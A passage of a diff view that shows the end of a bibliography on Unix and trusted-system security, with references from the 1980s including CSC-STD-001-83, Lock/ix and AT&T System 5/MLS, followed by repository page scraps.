computer system evaluation criteria" CSC-STD-001-83, USA (1983)
|
||||
15 Stewart, F "Implementing security under Unix" Systems&Software
|
||||
(February 1986)
|
||||
16 Schaffer, M and Walsh, G "Lock/ix: An implementation of Unix for the
|
||||
Lock TCB" Proceedings of USENIX (1988)
|
||||
17 Chuck, F "AT&T System 5/MLS Product 14 Strategy" AT&T Bell Labs,
|
||||
Government System Division, USA (August 1987)
|
||||
==============================================================================
|
Some files were not shown because too many files have changed in this diff Show more
Loading…
Reference in a new issue